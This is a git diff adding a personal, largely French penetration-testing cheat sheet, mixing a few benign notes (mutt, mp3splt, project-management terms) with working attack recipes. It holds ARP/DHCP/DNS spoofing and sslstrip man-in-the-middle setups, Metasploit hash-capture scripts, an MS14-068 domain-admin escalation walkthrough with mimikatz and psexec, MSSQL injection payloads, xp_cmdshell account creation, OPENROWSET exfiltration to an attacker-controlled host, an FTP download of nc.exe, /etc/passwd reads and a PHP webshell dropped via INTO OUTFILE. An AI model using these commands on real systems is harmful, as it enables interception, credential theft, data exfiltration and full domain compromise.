+Trudy https://github.com/praetorian-inc/trudy
+
+# anti arp spoof
+http://arpon.sourceforge.net/
+
+# linking 2 laptops
+* setting up
+iwconfig wlan0 channel 3
+iwconfig wlan0 enc on
+iwconfig wlan0 key 1234-1234-12
+iwconfig wlan0 essid hsc
+ifconfig wlan0 2.3.2.1 netmask 255.0.0.0 up
+iptables -I INPUT 1 -i wlan0 -m mac --mac-source ! 00:11:22:33:44:55 -j DROP
+iptables -i INPUT -i wlan0 -p tcp --dport ssh -s 2.3.2.20 -j ACCEPT
+iptables -P INPUT DROP
+* accessing
+iwconfig: idem
+ifconfig wlan0 hw ether 00:11:22:33:44:55 
+ifconfig wlan0 2.3.2.20 netmask 255.0.0.0 up
+
+# superfish / komodia
+https://blog.filippo.io/komodia-superfish-ssl-validation-is-broken/
+
+#### webmitm avec ARP poisoning
+openssl genrsa -out example.key 1024
+openssl req -new -key example.key -out example.csr
+openssl x509 -req -days 365 -in example.csr -signkey example.key -out example.crt
+
+cat > /etc/hosts-to-spoof <<'EOF'
+192.168.0.31 www.example.com
+192.168.0.31 *.google.*
+EOF
+
+dnsspoof -f /etc/hosts-to-spoof dst port udp 53 # uniquement en ARP poisoning
+iptables -I FORWARD 1 -p udp --dport 53 -m string --hex-string '|01 00 00 01 00 00 00 00 00 00 03 77 77 77 06 67 6f 6f 67 6c 65 03 63 6f 6d 00 00 01 00 01|' -j DROP # ne pas forwarder toute query A pour www.example.com
+
+echo 1 > /proc/sys/net/ipv4/ip_forward
+
+# broadcast ARP replies to all hosts, saying that the IP of the gw maps to my MAC address
+arpspoof IP_gw
+# ou mieux: unicast ARP replies to only victim and gateway
+arpspoof -t victim gw
+arpspoof -t gw victim
+
+# Va ecouter sur :80 et :443 et se base sur Host: ou URL complète pour rediriger (sauf si argument host).
+# Va servir le meme certificat SSL serveur.
+# Il faut des \r\n dans la requete (marchera pas avec des \n).
+webmitm -ddd
+
+#### mitm avec DNS poisoning
+# e.g. csrf pour mettre une resolution statique www.google.fr 192.168.0.31
+# ou
+# dhcp spoof avec mon ip comme nameserver:
+# dnsmasq - Permet de forwarder. Permet pas de faire *.google.*
+dnsmasq -k -q -8 /tmp/dnsmasq.log -A '/google.fr/google.com/192.168.0.31'
+
+#sniff avec Wireshark (trafic en clair uniquement)
+iptables -t nat -I PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.0.32.10 # IP du site web usurpé
+iptables -t nat -I POSTROUTING -j MASQUERADE
+et lancer un wireshark
+
+#sniff avec Burp 
+iptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8082
+iptables -t nat -I PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8082 # generation auto de cert avec CN=w.x.y ne marche pas
+
+#sniff avec Squid
+iptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 3128  # squid.conf: http_port 3128 accel vhost 
+iptables -t nat -I PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 3129 # squid.conf: https_port 3129 vhost cert=wildcard.pem # mais avertissement de secu probable
+
+#sslstrip
+iptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 1337
+$ sslstrip -f -a -l 1337 -w /tmp/sslstrip.log # pas en root
+
+#sniff de mdp
+dsnif -n
+ettercap -Tzq
+
+urlsnarf | cut -d\" -f2
+tshark -ln -i eth0 -R http -V| sedhttp
+
+#### mitm avec DHCP et DNS poisoning (half-duplex: on ne voit pas les reponses)
+#avec dnsmasq
+echo 1 > /proc/sys/net/ipv4/ip_forward
+dnsmasq -k -q -8 /tmp/dnsmasq.log --dhcp-range=192.168.0.10,192.168.0.50,255.255.255.0,24h --dhcp-option=option:dns-server,8.8.8.8 # je suis le routeur
+# et meme manip sslstrip pour le ssl 
+arpspoof -t 192.168.0.254 192.168.0.20 # pour voir les reponses (ie. reponses HTTP, images ...)
+
+#avec ettercap
+ettercap -Tzq -M dhcp:/255.255.255.0/8.8.8.8
+
+# mitm iphone
+cat hostapd.conf 
+interface=wlan0
+driver=nl80211
+ssid=hsc
+channel=11
+hw_mode=g
+macaddr_acl=0
+auth_algs=1
+ignore_broadcast_ssid=0
+wpa=2
+wpa_passphrase=blahblah
+wpa_key_mgmt=WPA-PSK
+wpa_pairwise=CCMP
+rsn_pairwise=TKIP
+
+hostapd ./hostapd.conf
+
+ip addr add 192.168.8.1/24 dev wlan0
+echo 1 > /proc/sys/net/ipv4/ip_forward
+route add default gw ... #optional
+
+$IP4 -A FORWARD -i wlan0 -j ACCEPT
+$IP4 -A FORWARD -o wlan0 -d 192.168.8.0/24 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
+
+iptables -t nat -I PREROUTING -p tcp -s 192.168.8.46 --dport 80 -j REDIRECT --to-ports 8082
+iptables -t nat -I PREROUTING -p tcp -s 192.168.8.46 --dport 443 -j REDIRECT --to-ports 8082
+iptables -t nat -A POSTROUTING -s 192.168.8.0/24 -j MASQUERADE
+
+dnsmasq --bind-interfaces --listen-address 192.168.8.1 -k -q -8 /tmp/dnsmasq.log --dhcp-range 192.168.8.10,192.168.8.50,255.255.255.0,24h --dhcp-option option:dns-server,192.168.8.1 --dhcp-option option:router,192.168.8.1 -p 54 -R -C /dev/null
+or just dns:
+dnsmasq --bind-interfaces --listen-address 192.168.8.1 -k -q -8 /tmp/dnsmasq.log -p 53 -C /dev/null
+
+# wifi mitm to try out
+http://www.reddit.com/r/netsec/comments/1hcnz7/python_mitm_tool_targeting_script_for_local/
+https://github.com/hatRiot/zarp
+
+# redir *
+iptables -A OUTPUT -p ICMP -j DROP
+iptables -t nat -A PREROUTING -p udp --dst 192.168.10.21 --dport 53 -j DNAT --to-destination 192.168.12.38:53
+iptables -t nat -A PREROUTING -p udp --dst 192.168.10.21 --dport 88 -j DNAT --to-destination 192.168.12.38:88
+iptables -t nat -A PREROUTING -p tcp --dst 192.168.10.21 --dport 445 -j DNAT --to-destination 192.168.12.38:445
+iptables -t nat -A PREROUTING -p tcp --dst 192.168.10.21 --dport 389 -j DNAT --to-destination 192.168.12.38:389
+iptables -t nat -A PREROUTING -p tcp --dst 192.168.10.21 --dport 139 -j DNAT --to-destination 192.168.12.38:139
+
+# proxenet inject html + capture smb
+MYIP=192.168.122.99
+VICTIMIP=192.168.122.141
+GWIP=192.168.122.1
+
+cat > ~/.proxenet.ini <<EOF
+[oPhishPoison]
+; This should point to the payload to be inserted as the HTTP response.
+; For example:
+; msfvenom -p windows/shell_reverse_tcp -f raw -b '\x0d\x0a\x00\xff' -o mypayload LHOST=192.168.56.1 LPORT=4444
+msfpayload   = %(home)s/tmp/my_payload
+
+; Point to Python binary
+python       = /usr/bin/python2.7
+
+; Download https://gist.github.com/hugsy/18aa43255fd4d905a379#file-xor-payload-py
+; and copy its path to this configuration script.
+xor_payload  = %(home)s/code/xor-payload/xor-payload.py
+
+; This should point to the HTML page to inject every time a user fetches
+; any HTML page
+html_inject_stub = %(home)s/injected_page.html
+EOF
+echo whatever > ~/injected_page.html
+
+modify payload in inject_this() with $MYIP
+
+sed -e 's,^Port 8080,Port 3129,' /etc/tinyproxy.conf
+service tinyproxy restart
+
+./proxenet -b $MYIP -p 8008 -N -X 127.0.0.1 -P 3129
+
+iptables -t nat -I PREROUTING -i eth0 -p tcp ! -s $MYIP --dport 80 -j REDIRECT --to-port 8008
+iptables -t nat -I PREROUTING -i eth0 -p tcp ! -s $MYIP --dport 445 -j REDIRECT --to-port 445
+iptables -t nat -A POSTROUTING -s 192.168.122.0/24 -j MASQUERADE
+
+cat > msf-capture.rc <<EOF
+set ConsoleLogging true
+set LogLevel 5
+set SessionLogging true
+set TimestampOutput true
+set PROMPT %T S:%S J:%J
+
+use auxiliary/server/capture/smb
+set SRVHOST $MYIP
+set JOHNPWFILE /root/capture-smb
+exploit -j -z
+
+use auxiliary/server/capture/http_ntlm
+set SRVHOST $MYIP
+set SRVPORT 8080
+set URIPATH /
+set JOHNPWFILE /root/capture-http-ntlm
+exploit -j -z
+EOF
+msfconsole -r msf-capture.rc
+
+arpspoof -t victim gw
+arpspoof -t gw victim
+
+
diff --git a/Cheat Sheet/moa b/Cheat Sheet/moa
new file mode 100644
index 0000000..5620899
--- /dev/null
+++ b/Cheat Sheet/moa	
@@ -0,0 +1,10 @@
+# moa/moe
+
+moa: maitrise d'ouvrage
+moe: maitrise d'oeuvre
+amo: assistance à maitrise d'ouvrage
+
+la MOA est responsable de l'organisation du travail, et fait appel à la MOE pour obtenir les produits (matériel, logiciels, services) nécessaires à la réalisation de la mission.
+=> donc MOA > MOE (est au dessus de)
+
+Le maitre d'ouvrage est l'adjoint ingénierie système du projet XXX. Son role concerne essentiellement le besoin, le choix et l'arbitrage des options, la définition des budgets et des délais de réalisation.
diff --git a/Cheat Sheet/mod_jk b/Cheat Sheet/mod_jk
new file mode 100644
index 0000000..4f47d0b
--- /dev/null
+++ b/Cheat Sheet/mod_jk	
@@ -0,0 +1,48 @@
+# tomcat-connector mod_jk
+
+# compiler mod_jk
+$ unzip tomcat-connectors-1.2.21-src.zip
+$ cd tomcat-connectors-1.2.21-src/native
+$ ./configure --with-apxs=/opt/m/httpd/httpd-2.0.52/bin/apxs
+
+$ vi httpd-2.0.52/conf/httpd.conf
+[...]
+LoadModule jk_module modules/mod_jk.so
+[...]
+JkWorkersFile /opt/m/tomcat/workers.properties
+JkShmFile     /opt/m/tomcat/mod_jk.shm
+JkLogFile     /opt/m/tomcat/mod_jk.log
+JkLogLevel    info
+#JkLogStampFormat "[%a %b %d %H:%M:%S %Y] "
+JkMount /WebApplication2/ServletTest worker1
+
+$ cat > workes.properties
+# Define 1 real worker using ajp13
+worker.list=worker1
+# Set properties for worker1 (ajp13)
+worker.worker1.type=ajp13
+worker.worker1.host=localhost
+worker.worker1.port=8009
+
+# tomcat directory traversal
+https://www.sec-consult.com/files/20070314-0-apache_tomcat_directory_traversal.txt
+
+SEC Consult Security Advisory < 20070314-0 >
+=======================================================================
+               title: Apache HTTP Server / Tomcat directory traversal
+             program: Apache HTTP Server / Apache Tomcat
+  vulnerable version: Apache Tomcat 5.x:  < 5.5.22
+                      Apache Tomcat 6.x:  < 6.0.10
+                 CVE: CVE-2007-0450
+
+Vulnerability description:
+---------------
+
+ * The only character found to be accepted as directory separator 
+   from Apache is "/" (slash).
+ * On the other hand Tomcat allows characters including URI encoded 
+   characters like "/" (slash), "\" (backslash) or "%5C" (backslash 
+   URI encoded).
+
+http://www.example.com/WebApplication2/%252E%252E/manager/html
+http://www.example.com/WebApplication2/\../manager/html (marche pas si windows)
diff --git a/Cheat Sheet/modbus b/Cheat Sheet/modbus
new file mode 100644
index 0000000..a56b8e3
--- /dev/null
+++ b/Cheat Sheet/modbus	
@@ -0,0 +1,3 @@
+# modbus
+
+https://github.com/enddo/smod
diff --git a/Cheat Sheet/modem b/Cheat Sheet/modem
new file mode 100644
index 0000000..7e1d562
--- /dev/null
+++ b/Cheat Sheet/modem	
@@ -0,0 +1,6 @@
+# modem
+
+br2684ctl -b -c 1 -a 0.xx
+ifconfig eth0 down
+ifconfig nas1 up
+dhcpcd -T --vendorclassid=NEUFTVSTB_MA nas1
diff --git a/Cheat Sheet/mp3splt b/Cheat Sheet/mp3splt
new file mode 100644
index 0000000..c63f4be
--- /dev/null
+++ b/Cheat Sheet/mp3splt	
@@ -0,0 +1,4 @@
+# mp3splt
+
+# extraire un morceau d'une interview audio
+mp3splt in.mp3 22.36 25.25 -o out.mp3
diff --git a/Cheat Sheet/ms14-068 b/Cheat Sheet/ms14-068
new file mode 100644
index 0000000..338a1c1
--- /dev/null
+++ b/Cheat Sheet/ms14-068	
@@ -0,0 +1,80 @@
+# ms14-068
+
+apt-get install krb5-user rdate -y
+rdate -n 10.10.10.10 # sync with DC's time
+
+* I had to comment out below line in /etc/krb5.conf to not use a keyring but the default ccache file:
+# default_ccache_name = KEYRING:persistent:%{uid} default_ccache_name = FILE:/tmp/krb5cc_%{uid}
+
+* the domain FQDN has to be in uppercase otherwise you’ll get this error: “kinit: KDC reply did not match expectations while getting initial credentials”
+$ kinit kevin@DOMAIN.INT 
+
+* you should now have a /tmp/krb5cc_1000 file
+
+* get the user’s SID
+$ rpcclient -U ‘kevin%P@ssword1’ somedc.domain.int
+rpcclient $> lookupnames kevin
+kevin S-1-5-21-1234567890-12345678-9876543-77601 (User: 1) rpcclient $> exit
+
+* use pykek to create a DA ticket
+$ python ms14-068.py -u kevin@DOMAIN.INT -s S-1-5-21-1234567890-12345678-9876543-77601 -d thepdc.domain.int
+
+* replace the ticket
+$ mv TGT_kevin@DOMAIN.INT.ccache /tmp/krb5cc_1000
+
+* pass -k and FQDN on command line (and not the IP, otherwise it will be ntlm)
+might need to first: export KRB5CCNAME=/root/Admin@domain.int.ccache && chmod 700 $KRB5CCNAME
+klist
+smbclient --kerberos -W DOMAIN.INT //dcw2k12.domain.int/c$ # might not work on vulnerable w2k12r2 
+
+kvno ldap/dcw2k12.domain.int@DOMAIN.INT # obtain service ticket
+klist
+
+* On my Windows7 VM I ran cmd.exe as Administrator and generated the hash of kevin’s password
+C:\>wce.exe -g P@ssword1
+
+* changed my current logon session
+C:\>wce.exe -s kevin:DOMAIN:11CB3F697332AE4C38F10713B629B565:EAD0CC57DDAAE50D876B7DD6386FA9C7
+
+* used mimikatz to inject DA ticket
+C:\>mimikatz.exe
+mimikatz # kerberos::ptc c:\TGT_kevin@DOMAIN.INT.ccache
+mimikatz # exit
+
+* confirmed I now was a DA
+C:\>dir \\thepdf.domain.int\c$
+
+* Now to get command exec, I simply killed explorer and spawned another explorer from the cmd.exe and ran psexec:
+C:\>explorer
+C:\>PsExec.exe \\thepdc.domain.int cmd.exe
+
+# winexe -k
+jamais teste mais ca a pas l'air de marcher avec winexe -k yes
+il faudra essayer avec winexe-waf
+
+# avec le patch de _r1
+copie du TGT_<user>@<domain> dans /tmp/krb5cc_<uid>
+modifier son resolv.conf pour ajouter "nameserver <ip_ad>"
+
+rpcclient -k -I <ip_addr> <FQDN_DC> 
+rpcclient $> createdomuser toto
+rpcclient $> setuserinfo2 toto 21 <password>
+rpcclient $> addgroupmember 512 toto
+(512 : groupe admin de dom)
+=> toto est admin de dom
+
+# avec net -k
+http://www.josho.org/blog/blog/2014/12/21/ldap-create-user/
+
+# avec winexe -k
+winexe: Installed: 1.1~20130620-0kali5
+krb5-user: Installed: 1.10.1+dfsg-5+deb7u3
+
+# blogs
+https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/
+http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
+http://hashcrack.org/page?n=10122014
+https://www.trustedsec.com/december-2014/ms14-068-full-compromise-step-step/
+https://www.shellandco.net/ms14-068-check-domain-controllers-date/ # remote check in powershell using wmi
+http://www.verisgroup.com/2015/04/08/ms14-068-background/ # convert krb tickets
+
diff --git a/Cheat Sheet/ms15-034 b/Cheat Sheet/ms15-034
new file mode 100644
index 0000000..9976680
--- /dev/null
+++ b/Cheat Sheet/ms15-034	
@@ -0,0 +1,10 @@
+# ms15-034
+
+http://www.securitysift.com/an-analysis-of-ms15-034/
+
+might need to issue a pre request first
+http://pastebin.com/ypURDPc4
+see msf module too
+Range" => "bytes=0-18446744073709551615 # carrier
+
+http_fuzz url=http://FILE0/ header='Range: bytes=0-18446744073709551615' 0=http-sys.hosts
diff --git a/Cheat Sheet/msaccess b/Cheat Sheet/msaccess
new file mode 100644
index 0000000..d6fcb52
--- /dev/null
+++ b/Cheat Sheet/msaccess	
@@ -0,0 +1,4 @@
+# ms access
+
+# sqli ms access
+http://www.krazl.com/blog/?p=3
diff --git a/Cheat Sheet/mssql b/Cheat Sheet/mssql
new file mode 100644
index 0000000..e357f44
--- /dev/null
+++ b/Cheat Sheet/mssql	
@@ -0,0 +1,235 @@
+# mssql
+
+# linux clients
+sqlquery (SQL Auditing Tools, (SQLat) http://www.vulnerabilityassessment.co.uk/sqlat.htm)
+TDSVER=7.0 tsql -S 192.168.122.23:1433 -U DOM\admin.global -P Password1 # or TDSVER=8.0
+impacket (http://pen-testing.sans.org/blog/pen-testing/2013/05/21/tds-mssql-and-python-oh-my)
+dbvis (GUI)
+sqsh (never tested, old++, and requires to configure /etc/freetds/freetds.conf)
+
+apt-get install freetds-dev
+export FREETDSCONF=${HOME}/.freetds.conf
+cat << EOF >> ~/.freetds.conf
+[target]
+  # The target IP address
+        host = x.x.x.x
+  # The target port
+        port = 1433
+  # tds version
+        tds version = 8.0
+EOF
+echo '\set semicolon_hack=on' >> ~/.sqshrc
+
+sqsh -w 256 -U sa -P '' -S 127.0.0.1 # sa/<empty>
+sqsh -w 256 -U sa -P '' -S target # uses .freetds.conf
+
+# windows clients (in Program Files)
+isql.exe –S PRDSRV1 –U sa –P Password1 –Q “SELECT name FROM master..sysdatabases”
+osql (same cmdline) (have a standalone in hsccvs)
+sqlcmd (same cmdline) supports 2008R2 features
+
+# osql usage
+osql -D BLAH -E #ODBC
+osql -Stcp:myServer,portNumber -E
+
+# getsysadmin (since mssql 2008 (2008 R2, 2012 ...) local admins are no longer members of the sysadmin role (http://msdn.microsoft.com/en-us/library/dd207004.aspx))
+* if < MS SQL 2012 then start SQL Server Management Studio as SYSTEM
+psexec -i -s SSMS.exe, or sqlwb.exe, or osql.exe -E
+
+* if >= MSSQL 2012, solution is to force sql server to put sql server in single mode (ie. this will DoS other clients) so that local admin can login and create a new sysadmin or add himself to sysadmins (http://mobydisk.com/softdev/techinfo/sqlserver.html)
+- force mixed-mode auth (not needed if you will create a new builtin sysadmin, required if you want to add local admin to sysadmins)
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQLServer set "LoginMode" to 2
+Restart SQL Server
+- single mode & new sysadmin
+services.msc -> stop SQL Server. Make sure SQL Server Agent service is stopped
+otherwise he will take the only connection.
+Grab the SQL server command-line (right click the service - properties) (“c:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER2008\MSSQL\Binn\sqlservr.exe” -sMSSQLSERVER2008)
+Open an administrative command prompt
+Run the command-line from step 3, but add -m -c for single-user maintenance mode command-line. ("c:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER2008\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER2008 -m -c)
+Open another administrative command prompt.
+Run "sqlcmd -S localhost\SQLEXPRESS" from that same directory (replace with your server and instance name)
+Now you can do all the stuff everyone told you to do that didn"t work. For example, to create a hero user with administrative access:
+CREATE LOGIN hero WITH PASSWORD="123", DEFAULT_DATABASE=[master], DEFAULT_LANGUAGE=[us_english], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF
+EXEC sys.sp_addsrvrolemember @loginname = "hero", @rolename = "sysadmin"
+GO
+QUIT and close the command-prompt
+Go to the SQL Server command-line window and hit ctrl+C. It will prompt "Do you wish to shutdown SQL Server (Y/N)?" and enter Y.
+Close the command-prompt
+Restart SQL Server service and login away!
+
+# Mon install de MSSQLServer 2005 sur ma VM locale windows 2003 EN.
+Pendant l'install, j'ai selectionné :
+ - "Default instance"
+ - "Use the built-in System account" "Local system"
+ - "Windows Authentication Mode"
+Le reste des questions, j'ai laissé par defaut.
+
+# hashcat mssql
+0x0100 [a-Z0-9]{8} [a-Z0-9]{40}        [a-Z0-9]{40}
+           salt   sha1($pass.$salt)  sha1($pass.upper().$salt)
+oclhashcat-plus -m 2500
+oclhashcat-lite -m 1300
+
+# audit / pentest
+* boolean blind
+and unicode(substring((select isnull(@@version,char(32))),1,1))=77 # 'M' de Microsoft
+
+group by news.news_id having 1=1--
+
+* error based sqli
+and 1=convert(int,@@version) and 'a'='a
+and 1=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'
+
+* time
+foo=bar' waitfor delay '0:0:5'--
+
+* stacked time
+;waitfor delay '0:0:5'--
+;if(1=1) waitfor delay '0:0:5'--
+;if(unicode(substring((select version()),1,1)>51) waitfor delay '0:0:5'--
+
+* basics
+sqlcmd -L
+sqlcmd -S <server> -U sa -P <password> *
+1> USE [Database With Spaces]
+2> select Email, PasswordFormat, PasswordSalt, Password from aspnet_Membership
+3> go
+
+select @@version
+select @@servername
+select db_name()
+select user_name()
+exec master..xp_msver
+exec master..xp_loginconfig
+select name, value_in_use from sys.configurations #name collate SQL_Latin1_General_CP1_CI_AS, cast(value_in_use as int)
+select SERVERPROPERTY('MachineName') # server name
+select CONNECTIONPROPERTY('local_net_address'), CONNECTIONPROPERTY('client_net_address') # > mssql 2005, local IP and remote IP
+
+* list users
+SELECT name FROM master..syslogins
+
+* list passwords
+  < mssql 2005
+SELECT name, password FROM master..sysxlogins
+SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins
+  >= mssql 2005
+SELECT name, password_hash FROM master.sys.sql_logins 
+SELECT name + ':' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
+
+* list sysadmins
+SELECT name FROM master..syslogins WHERE sysadmin = '1' # >= mssql 2005
+
+* list dbs
+EXEC sp_databases
+select name, filename from master..sysdatabases
+SELECT DB_NAME(N); — for N = 0, 1, 2, …
+
+SELECT table_schema+'.'+table_name FROM information_schema.tables WHERE table_catalog=''
+
+* list tables
+select name from nom_de_la_base..sysobjects where type='U'
+select table_name from nom_de_la_base.information_schema.tables
+
+* list columns
+select column_name from [database name].information_schema.columns where table_name = N'the_table'
+
+* list tables & columns
+SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM ladb..sysobjects JOIN ladb..syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' # AND syscolumns.name LIKE ‘%PASSWORD%’ — this lists table, column for each column containing the word ‘password’
+
+* get table desc
+exec sp_columns nom_table
+
+* dump table
+select top 10 * from [nom_db].[nom_schema].[nom_table] // eg. webapp.dbo.users
+
+* liste les fonctions udf
+SELECT name AS function_name, SCHEMA_NAME(schema_id) AS schema_name, type_desc FROM ladb..objects WHERE type_desc LIKE '%FUNCTION%';
+SELECT name AS function_name, SCHEMA_NAME(schema_id) AS schema_name, type_desc FROM sys.objects WHERE type_desc LIKE '%FUNCTION%';
+or
+select name, definition, type_desc FROM sys.sql_modules m INNER JOIN sys.objects o ON m.object_id=o.object_id where type_desc like '%function%'
+
+# xp_dirtree
+master.dbo.xp_dirtree to force the db server to authenticate to an SMB server
+EXEC master.sys.xp_dirtree 'D:\Backup\TRON4\TEST2\MyDb1',0,1;
+
+# xp_cmdshell
+id=1; exec xp_cmdshell 'net user own3d Password1 /add'
+
+select * from SYS.CONFIGURATIONS WHERE Name='xp_cmdshell'
+
+si xp_cmdshell a été desactivé, commandes pour le reactiver (SQL Server 2005 ou 2008):
+exec sp_configure 'show advanced options',1;reconfigure; OU reconfigure with override # si ca n'a pas marche
+exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure; # dunno what that does (c/p from blog)
+exec master.dbo.sp_configure 'xp_cmdshell',1;reconfigure; OU reconfigure with override
+
+On MSSQL 2000:
+  If you have 'sa' privileges but xp_cmdshell has been disabled/removed with sp_dropextendedproc, 
+  we can simply inject the following code:
+
+  EXEC sp_addextendedproc 'xp_anyname', 'xp_log70.dll';--
+
+  This creates a new stored procedure 'xp_anyname' linked to xp_log70.dll, which provides the xp_cmdshell functionality.
+  If the previous code does not work, it means that the xp_log70.dll has been moved or deleted. In this case we need to inject the following code:
+
+    CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
+    DECLARE @result int, @OLEResult int, @RunResult int
+    DECLARE @ShellID int
+    EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
+    IF @OLEResult <> 0 SELECT @result = @OLEResult
+    IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
+    EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
+    IF @OLEResult <> 0 SELECT @result = @OLEResult
+    IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
+    EXECUTE @OLEResult = sp_OADestroy @ShellID
+    return @result
+http://xd-blog.com.ar/descargas/manuales/bugs/full-mssql-injection-pwnage.html
+
+# command exec without xp_cmdshell with agent jobs
+https://www.optiv.com/blog/mssql-agent-jobs-for-command-execution
+
+# OPENROWSET 
+# http://codewhitesec.blogspot.com.au/2015/06/reading-and-writing-files-with-mssql-openrowset.html
+si on n'est pas sysadmin
+* first make sure openrowset is enabled with 'ad hoc distributed queries'
+select * from OpenRowSet('SQLOLEDB','Network=DBMSSOCN;Address=yespapa.d2t.attacker.com;uid=sa;pwd=','exec master..xp_msver')
+* exfiltration
+blah');INSERT INTO OPENROWSET('SQLOLEDB','<my external IP>';'sa';'1dhw753',output_db.dbo.output) SELECT @@version;--
+* read local file
+create table #output (output varchar(255) null);insert #output exec xp_cmdshell 'dir C:\'; INSERT INTO OPENROWSET('SQLOLEDB','<my external IP>';'sa';'1dhw753',output_db.dbo.output) select * from #output where output is not null; drop table #output
+* copying entire db etc.
+http://www.secforce.com/blog/2013/01/stacked-based-mssql-blind-injection-bypass-methodology/
+* can also do password guessing attack against a sysadmin to be able to xp_cmdshell
+select * from OpenRowSet('SQLOLEDB','Network=DBMSSOCN;Address=<server IP or servername>;uid=sa;pwd=','select 1337')
+
+# abusing users that have been granted impersonate permissions to switch to sa or DAs
+https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/
+
+# upload file
+exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';--
+exec master..xp_cmdshell 'echo USER >> ftpscript.txt';-- 
+exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';--
+exec master..xp_cmdshell 'echo bin >> ftpscript.txt';--
+exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';--
+exec master..xp_cmdshell 'echo quit >> ftpscript.txt';--
+exec master..xp_cmdshell 'ftp -n -s:ftpscript.txt';--
+
+# export table to file
+exec xp_cmdshell 'bcp "select * from db.dbo.tablename" queryout "c:\windows\temp\blah.txt" -c -T'
+
+# tricks
+https://www.netspi.com/blog/entryid/228/locate-and-attack-domain-sql-servers-without-scanning
+http://www.casaba.com/blog/2013/05/sql-server-now-with-reflective-dllexe-injection/
+https://www.netspi.com/blog/entryid/197/how-to-hack-database-links-in-sql-server
+https://www.netspi.com/blog/entryid/221/decrypting-mssql-database-link-server-passwords
+https://blog.netspi.com/decrypting-mssql-credential-passwords/
+
+# mitm
+https://gist.github.com/thinkst/db909e3a41c5cb07d43f (http://blog.thinkst.com/2015/11/stripping-encryption-from-microsoft-sql.html) # downgrade to strip encryption
+https://www.optiv.com/blog/mssql-agent-jobs-for-command-execution
+
+# sqlmap notes
+il fallait que j'enleve le cast(@@version AS NVARCHAR(4000)) de son payload pour que ca passe
+
+# evasion
+mssql allow chars from 01-1f to be used as whitespaces
+iis+asp parameter pollution inserts , need to use /**/ like .aspx?iid='; /*&iid=1*/ EXEC /*&iid=1*/ master..xp_cmdshell /*&iid=1*/ "ping 10.1.1.3" /*&iid=1*/ -- => '; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ "ping 10.1.1.3" /*,1*/ --
diff --git a/Cheat Sheet/mtu b/Cheat Sheet/mtu
new file mode 100644
index 0000000..62b82c5
--- /dev/null
+++ b/Cheat Sheet/mtu	
@@ -0,0 +1,8 @@
+# mtu
+
+# pour faire ppp over FreeWifi, il faut diminuer le MTU de son interface wifi
+ifconfig <[ae]thX> mtu 1400
+
+# iproute2
+ip link set dev tun0 mtu 296
+
diff --git a/Cheat Sheet/mutt b/Cheat Sheet/mutt
new file mode 100644
index 0000000..76fc93d
--- /dev/null
+++ b/Cheat Sheet/mutt	
@@ -0,0 +1,28 @@
+# mutt
+
+# pour ouvrir les PDF dans Kpdf depuis mutt, j'ai ajouté la ligne suivante dans mon ~/.mailcap
+application/pdf; kpdf %s
+
+# mais bizarrement il n'est pas lu, donc j'ai ajouté cette ligne dans /etc/mailcap et là ça marche.
+
+# search
+/~b blahblah
+
+# to_chars
++ email not addressed to your address
+T I am the only recipient
+C I am in To: but not alone
+F I am in CC: but not alone
+L sent to a mailing list I suscribed to
+
+# fedora mutt + patch sidebar
+j'ai recuperer le srpm officiel du packet mutt avec yumdownloader --source mutt # downloads mutt-1.5.21-20.fc19.src.rpm
+j'ai extrait le rpm
+j'ai ajoute le patch sidebar dans le mutt.spec
+j'ai supprime les lignes du patch sidebar qui modifiait le configure.ac pk ca faisait foirer un autre patch
+j'ai contruit le .rpm et le .src.rpm, ils sont dans bak sur kool
+
+# convert *.eml files to maildir
+mkdir -vp /tmp/inbox/{cur,new,tmp}
+for i in *.eml; do cat "$i" | getmail_maildir /tmp/inbox; done
+mutt -R -m mailbox -f /tmp/inbox/
diff --git a/Cheat Sheet/mysql b/Cheat Sheet/mysql
new file mode 100644
index 0000000..e3b638f
--- /dev/null
+++ b/Cheat Sheet/mysql	
@@ -0,0 +1,121 @@
+# mysql
+
+# auth bypass
+https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
+for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
+auxiliary/scanner/mysql/mysql_authbypass_hashdump
+
+# common tricks
+select user(),database(),version(),@@datadir,5
+select load_file('/etc/passwd') or SELECT CAST(load_file( '/etc/apache2/sites-enabled/000-default') AS char) 
+select "<?php eval($_REQUEST['c']); ?>",2,3,4 INTO OUTFILE "/var/www/html/temp/webshell.php" -- # or use eval()
+
